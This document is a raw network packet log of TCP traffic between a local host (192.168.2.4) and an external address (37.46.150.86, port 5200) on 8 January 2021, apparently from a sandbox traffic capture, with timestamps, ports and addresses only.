Jan 8, 2021 09:36:20.025708914 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025748014 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.046612978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.046633959 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.046653986 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.046745062 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073152065 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073179960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073193073 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073209047 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073225021 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073240995 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073257923 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073276043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073292971 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073307991 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073324919 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073339939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073354959 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073369980 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073400021 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073406935 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073416948 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073437929 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073457956 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073473930 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073489904 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073503017 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073504925 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073522091 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073539019 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073540926 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073555946 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073569059 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073575974 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073594093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073601007 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073610067 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073626995 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073633909 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073645115 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073662043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073677063 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073688030 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073693037 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073714018 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073720932 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073731899 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073748112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073749065 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073764086 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073771954 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073781013 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073796988 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073807001 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073812008 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073827028 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073841095 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073846102 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073863029 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073873997 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073879004 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073894978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073896885 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.073910952 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.073946953 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.093826056 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.093971014 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.093987942 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.094069958 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.094119072 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121129036 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121153116 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121171951 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121190071 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121208906 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121227026 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121248960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121594906 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121622086 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121649981 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121668100 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121686935 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121710062 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121731043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121741056 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121751070 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121771097 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121778965 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121789932 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121809006 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121812105 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121831894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121836901 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121846914 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121865988 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121879101 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121885061 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121902943 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121921062 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121923923 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121948957 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.121953011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121972084 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.121989012 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122004032 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122010946 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122020960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122037888 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122052908 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122056961 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122070074 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122081041 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122086048 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122106075 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122107983 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122127056 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122129917 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122143984 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122159958 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122169971 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122175932 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122190952 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122205973 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122209072 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122221947 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122235060 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122241974 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122260094 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122262001 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122275114 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122291088 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122306108 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.122319937 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.122370005 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.141027927 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.141062975 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.141088963 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.141110897 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.141109943 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.141161919 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.141483068 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.141501904 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.141540051 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169425011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169454098 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169473886 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169496059 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169517994 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169538021 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169536114 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169564009 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169588089 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169603109 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169610023 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169634104 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169635057 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169657946 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169666052 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169681072 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169704914 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169708014 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169728041 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169753075 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169754028 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169776917 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169800043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169816971 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169821978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169836998 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169845104 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169867992 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169889927 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169910908 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169914007 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169935942 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169940948 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.169960022 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169982910 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.169989109 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170007944 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170022011 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170032978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170056105 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170077085 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170084953 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170099974 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170120955 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170124054 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170150042 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170171976 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170185089 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170195103 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170217991 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170231104 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170241117 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170264959 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170267105 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170286894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170311928 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170314074 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170336008 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170350075 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170358896 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170382023 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170396090 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170406103 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170428038 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170449972 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170455933 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170475006 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170495033 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170500040 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170522928 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170547009 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170569897 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170574903 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170593023 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170617104 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170639038 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170643091 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170649052 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170664072 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170681000 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170690060 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170712948 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170734882 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170747042 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170757055 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170779943 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170782089 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170804024 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170825958 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170828104 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170850039 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170864105 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170876980 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170898914 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170918941 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170938969 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170960903 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.170975924 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.170983076 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171006918 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171016932 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171030045 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171046972 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171056986 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171080112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171101093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171106100 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171149015 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171190977 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171215057 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171256065 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171278954 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171279907 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171304941 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171328068 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171335936 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171380043 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171385050 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171407938 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171442986 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171454906 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171489954 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171525002 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171550989 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171554089 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171576977 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171592951 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.171602011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.171654940 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.188627005 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188653946 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188671112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188694000 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188719034 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188738108 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188760996 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188783884 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188802958 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188823938 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.188827038 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.188862085 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.188899994 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219196081 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219230890 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219254971 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219275951 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219299078 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219302893 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219321012 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219345093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219347954 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219369888 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219382048 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219394922 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219410896 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219419003 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219444036 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219464064 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219468117 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219492912 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219512939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219536066 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219540119 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219561100 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219578028 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219588041 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219607115 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219611883 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219635963 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219657898 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219659090 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219681025 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219702005 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219703913 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219727993 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219748020 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219749928 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219775915 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219798088 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219819069 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219822884 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219846010 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219856977 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.219868898 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219886065 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219902039 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219918013 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219940901 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219957113 CET	49747	5200	192.168.2.4	37.46.150.86
